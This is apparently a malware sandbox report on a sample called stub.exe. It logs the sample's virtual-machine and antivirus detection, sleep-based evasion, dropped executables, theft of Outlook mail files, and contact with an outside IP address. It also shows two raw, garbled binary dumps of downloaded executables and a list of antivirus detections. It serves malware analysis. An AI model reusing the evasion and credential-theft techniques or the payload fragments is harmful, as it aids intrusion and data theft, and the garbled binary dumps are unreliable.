NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

stub.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Aug. 17, 2024, 10:11 p.m.	total_number_of_free_bytes: 13324574720 free_bytes_available: 13324574720 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (2 events)

file	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
file	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

Drops a binary and executes it (2 events)

file	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
file	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BaseBoard
wmi	SELECT * FROM Win32_DiskDrive

An executable file was downloaded by the process stub.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 17, 2024, 10:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¦=´fàn. @ à@ÜO ÎÀ H.text4m n `.rsrcÎ p@@.relocÀv@BHgH%&( rp ( rCp¦s s s s rgp* göhrËp râór/p õ¡¾rp p{r÷p* Üâ?(( rp* ðß¿ríp SÝÂ(+-(,,+(-,+(,+(),(Z "(Ë+"(+&(9&+î+5sk ¸ 'ol (, ~- (b(T~om &-Èra p ÒrÅ p y4r)p E/rprñprUpr¹p* îÍ'r p +ur p D·rå p ú³érIp 9rprprup {°rÙp üJîjsn ~ "(d+:t(_+rCp* mr§p Æ =rp ¾\£rop ¥ rÓp Æ(Tr7prprÿprcprÇp mÔ`r+p wtrp MO¸róprWpr»p êór`p µrrp ^ûrªp M^rOp nrôp rp zÊ¨B~(" !:(- (+:(- (+rb pr!p ·Or¬!p ¨WªrQ"p Ð¬ rö"pr#pr@$p x!rå$pr%p* ¤mr/&prÔ&p* X×àry'p áçer(p Ó ðrÃ(p rh)pr p ¸¨ra,p ~¿Hr-p ·þÍsÿ+~ , -V~+(Ì,( ro/pr0p* =Ur¹0pr^1p* Y mr2pr2p* ×Ýr3pr3p* ¼Ír'4p 7_ªr°4p ·r95p õ qrÂ5p vrK6p JþrÔ6pr]7præ7p Ïà«ro8p \=rø8p lÂºr9ps .rÏ9ps /r:ps 0.s( r3:pr¼:p* 1T62ý( rE;p* ó+rÎ;p v¨:( }3+:{4(! +rW<p ì+<.( 5(" o# ~2(&o# (&(#rJ=prÓ=p Tr\>p ªJSrå>prn?p* _Er÷?p ¦£«r@p ºib~A,~AoT Ar8DprÁDp MúrJEprÓEpr\FpråFp* äÃrnGpr÷Gp* RTÞrÀHprIprRJprKpräKprLprvMp \|´r?Np sÉÅrOp hòrÑOprPprcQp ¼ r,RprõRpr¾Sp Ë÷WrTprPUp* 6rVprâVp0~o +0~o +0~o +0~o! +0(" (# +0($ +0Ð(% +0(& +0 - (+ ++ +0 þ0 ~) - (+) ~) +0r[prµprçp rp %rKpr}p r¯práprpr5p(* r?p(+ rQprÔprWp*0 6~ èØ(, ~(/(- ~(/(- ~ (/(- ~ (/(- ~(/(- ~ (/(- ~(/(- (. ~(/(- ~(/(- ~(/(- ~(/(- Þ%(/ (0 (1 Þ(I-(0 ((Þ%(/ (1 Þ('~rQp~(2 s3 o4 o5 (- (6 - (- (7 &(8 ,s3 o9 è(, ~:(: (; Þ%(/ (1 ÞrUps< o= (Y(> ,F 6rop¢~(? ¢rËp¢¢rÛp¢(@ oA +D 6rßp¢~(? ¢rËp¢¢rÛp¢(@ oA (B oC Þ%(/ (1 Þ(oD oE r#poF ~(? oG Þ%(/ (1 Þ(H rQp~(? rp(I rpr¥p(J r§p¢G(K ,(" Ð6(% (L t6rÅp¢(M rÛpr¥p¢(M rýp(N &sO 6Þ%(/ (1 Þ(=þ0sP sQ oR þ1sP sQ oR (Y(> ,("þ2sP sQ þ3sP request_handle: 0x00cc000c	1	1	0
InternetReadFile Aug. 17, 2024, 10:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd£ð"0H @ `@@ n H.textÜG H `.rsrcn J @@Hd[ x8ß#GdßPÉ6þ>ö¾(Öæ=#U.ÒôRiüD¾ÂòHÁx7Ùzø)V?2tð sîîå«A]ÐÅ4ìrI0 P÷hsÝué;PÊ§¤§ûõíuÈ7£g£þ`ò»´µD.aìp÷Ü³ñÏnRa+5Õuxr Ì!6§}õË{ÄAá6ö9û/W8©'ÖÓ¢e¢ËÕU\|x+Tqäé7+9Gøt¹Ú=»J¤ÇE[_¬à¯MXáêó!@9½6À]º·AáÄ t{¼"V iÚù%².-ÒLd$ëqí«-ÛÍxbÐ^}3:c_ÞDÔÓk^ý¤ ~48AÜuíRõÆdcÿlÆoñ<¤ ðÑ£PÏX¾Î$Hâ vN¢2ó¥?y6~Y "²ü3Î üÙá ÏWÑÙ£.åCH'²ð;õÝ Ff¦ªÊýòCÍHîxñKÄÊì®~´§h¾¶GyW Ý¼? á^±ÕÎ2®,½ó®>`rHOÀ^¤pÚd¦¾LzðýÍñKÿ·xNi6Ý]b^²eVW3(êÓMñWoVyHÇ@ì"ã5çnbêmÐ°Ðe/L#ÛòÇºw<\7O+ò\|³ãÇ¯)JIÜî%:»p5r`#ë"X1Æz ¥Ýg'P+@ÿ,jfí(s§cÝ %ë¿DABã^µZT#ÐTa×u$,À2ÈÞdñÙbæQÍ¿Ö`;4D¶×üØF½Èx0$cw.¥ÃD¶D-¹´ëÏêh¦WÛ)6n<ý'¢õÐ ðs6HËXÜa$?AÏÝâ q.ZÕ9}ï©« ää{¼«M ÆYÎ L ¡®Ñ¾µàìÀwºô[IèMÿ¤ðÜte: ÄF¼æRîmöÚ¶>%KSSiD/é£ZqMúË>3F®©âìÖNha.Æü¾}^õ»,:^!Ù-Õª¡ç ¦wÛÜõw²¸()b~: n(Üæ5À@,CqXÏ;¨4îQï¸{Cþ\t4Ü@û¡ÑÙ{(2áT9_b)ù¹9ì? ç¾ÛÃ©¿þ).ùåÏç¥®dH7®¾û{vSØ¼N·K?-°Ï×;¤oFÄ9ïóûfU¦M$fLÃ/~pÄZ¿åU_$ÅÉôî×dé]66Ù Tí»kyíÝ±XÙY kì;×ùAÄ«âªKXÚ`2þpõ%JHh ÜxÚÊ»dÝâLÌåRÑ ¼½¹âÈ ?{Õn/¾î+ÄLæ?á«4¨ÎI5;»0Éôàú~ÎUYºÚn7ÈYûX±ë:ÐÍ ¡fÐ1þo#pÍµ_Z/Á9ZhúÎîv«\[½H»}¡xýì" ~·¯ËÜÅÐb¤¦ Òßµgr°56ôªîi Óß6µê»#Õ$Òá9´JÞ¶u%æ».êQOQá%DÂW4çá#5KcèÛ³ä°ürÄFÌt lµ¡f@õëQÂ>@µ)d¯rËã¨ÀÆº`ÄBX ÉÔpk6EYÇ¾'8Á½P6Ä~@ÅZ³â¸,ÕæÛàï[âwK: #iÆ£l)KÌÿemk4'[Þ>B-ß¼0cÜñ§¦Ö¼Ï·1"âª3[ª"ÂàMvÅÌÁH ãÀa¤`¿eW~v!ÝQ¶E_XeÜ[¦&`vLõCòË?Òâÿ±ÊFòU,ËM,ï<6ËÄgÅê°xÔK %Ù8aS`@h;Xa²a[¹àä+vn$¼b"Ü°ªd®OXÐÑ,ê¿øFeñçiÞ¢¤§»§¦\|²6Âa¢¹n£W0PÓ¨äXcqKorÓÐå÷ÈØíÉÚXVbº^¯qo ø,à>ËCö_<"zéá&l¨dýyút6ßêÖÝ5 ù 1Ëé¡N, A[C~Ë»)Àòæ³Aê\-uÞÊtu(Lið7#í-ÌñSÿ×¢p+³»,ªâ"ÓÐ\Ø¬¡}úE7Ã$Bk¾¢CfUvëk¼º'Û<±Ý8t¥$ì4h}Ï3¹Dþjý¿r¢e¦²l`ø5 àò¦NG'³.«ùoî~½"!UâRîgALý³©ééód/ãsge&ß+²ÓõG»óõw¨t:ÔÕ»Ô=ÍÕÎPV<î+ Å¦vþZi8qZËBdØKÒÏêZ^uËWL´UÍHØ!°PeÈ°ý+Öì¼§±åNðùo7^ç°&É²~tá¾ýÛ8~ÑæþÑÐ2ða÷Fé8¸Á4éNô@F7¼úüå½öñü>Yo6¢¢ÎDu}'9OÏ½®½Ô¾þÅø+ÞçX-ÄÈä¾Ð=¸#¤Û\&·ã Â<ÃÒmP½c\pÚ+³~¼^¶;us,6¡MËsû4Öõ.ÄÉ\|²,°?_ÔzÙyÝ¦nQÚÏnMX÷Ô¡µB<úa@â¾¤¦XI¶]c£àjÈ½PÁ[Q¬JâL6¾dHõ._'¹bÈnùf)Vó¨UÄCÛifbñ»Â@!ðS!ÒMKI T÷~²J+:ð¾ð~¯ùã) Ä.Ö8-Á²¼÷7Ô\¯Véõ¦^w¯ºZVÍÏ1ð6BEÀ8¦@ÅX.y©5pÔÄ%]Þ ßhêaTYx³7öÁc¬A,¨«{Ò"@3#öú){]V~áÔ~}îhvæ>MK} <.mÚ¿ÔðÊ¡Vâ1]WF¥-kÐÌÞ¯}5 ©ÃÈ¢G3Í¾QÌa #@ÀûYRwìtfôssßÐ<î\|7 dÅè/<H1îùÒñÁÌy¶}½¹úô$Lèõõ"½X ï¾epQ-^@ZÎfó2ÒVSô(>¾Ùñ§M¯/ê>'¸íBà¸?ò£-¯¢Ä÷ÐHÈê£,¶åpú©Ø'mF°êúå}ïä$\|ÔÊ®ä LÚBBmßzÛ> ¼üìGõ²\|ò"úê/×¡=r½ïKaàô£1ø÷¡.À±ùºèdÀô²ûêÆ½§5Äï?e²ûá{K¡µÅö\ÕÔ`mA·¤ç§nwnDõ¢rRýviøªÑüÈhnQ#t¯Uû0¥G×fJû7,ikM`KS§¹.z¸t èØT¹5tè&&_=Ým¿v_Ï¹¬[U'2¡ýáçÝ·TTqKvè×xµtpOkÚ¿8ô6F0mÄä)j?9lï×è«}Üô¨a³®X¥«ÂsÇÈ²ÊP6RþÌ{i)L +¦I¯5£ÎEå¼Ü9+Û[`J-)àÒgÌHÏÇ9ãº` zs`·;kWË&Þ:ÒÚ®üÏjå5È/÷bw8cuÕi¼ñÙ¸îe2ÕMþ¦«©Ø4(ò0/xÌf0HUÕ§&Û³ÈÉ«#\ÀÔ.àY3³án$A ã45y¬¹dW%ÿñP¼kUmÔ2§ò@jäÖ_Ú^hQý<ð¥rîÂ¼bÐÊìÖ8Gkë¨¢¾¾Ü¬ÂûM`,éá0éÐ2J§µãé3-m¶òøkÈtXÈ¾ð£òï±£zí¨ NÇ6î²#þÇøÿKÇñD©T"²ûôÒ©Ä.Wqtiéy:4¸°Ø9ÓÐ7Ó[jÏË#Ûá»dhWeHù;V¼Ùù-¬^Ó 4î)2ïã£W:}2ïMáè[;ÀùzfÊOöOPos_ìI86ÚBVþK·Õý;¯(só¿%Ï&uç¸ENùßýÓâÒ²a¶e2ÐPió$='ø÷Yê°ÐÁÐÓ/ÝWÕ¦¶¿£eód[÷nÉfËr·ÌM®;½hDëPûó¨Ç2[ÐIR«\|64 t25§éñQb¸;3ëv!°Öæ¼_{Úü{Nñrºf=þn[©é½ÃKëÏýjù0\|³ÛËLô?§'°ÇkË¬$xëã request_handle: 0x00cc000c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 17, 2024, 10:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (1 event)

host

185.216.214.225

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Aug. 17, 2024, 10:11 p.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Aug. 17, 2024, 10:11 p.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Harvests credentials from local email clients (2 events)

file	C:\Users\admin\Documents\Outlook Files\outlook.pst
file	C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (8 events)

Time & API	Arguments	Status	Return
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1
CryptHashData Aug. 17, 2024, 10:11 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x000000000032ac10 flags: 0	1	1

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Generic.fh
ALYac	Gen:Variant.Jaik.219381
Cylance	Unsafe
VIPRE	Gen:Variant.Jaik.219381
Sangfor	Trojan.Win32.Save.a
BitDefender	Gen:Variant.Jaik.219381
Cybereason	malicious.36d079
Arcabit	Trojan.Jaik.D358F5
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Agent.AGPC
APEX	Malicious
Avast	Win32:MalwareX-gen [Trj]
Kaspersky	UDS:Trojan.Win32.Tasker.gen
MicroWorld-eScan	Gen:Variant.Jaik.219381
Emsisoft	Gen:Variant.Jaik.219381 (B)
McAfeeD	Real Protect-LS!F48972736D07
FireEye	Generic.mg.f48972736d07992d
Sophos	ML/PE-A
SentinelOne	Static AI - Malicious PE
MAX	malware (ai score=87)
Kingsoft	malware.kb.a.982
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	UDS:Trojan.Win32.Tasker.gen
GData	Gen:Variant.Jaik.219381
BitDefenderTheta	AI:Packer.5EC021C81E
DeepInstinct	MALICIOUS
VBA32	BScope.Trojan.Wacatac
Malwarebytes	Trojan.Zharkbot
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:MalwareX-gen [Trj]
CrowdStrike	win/malicious_confidence_90% (D)

stub.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All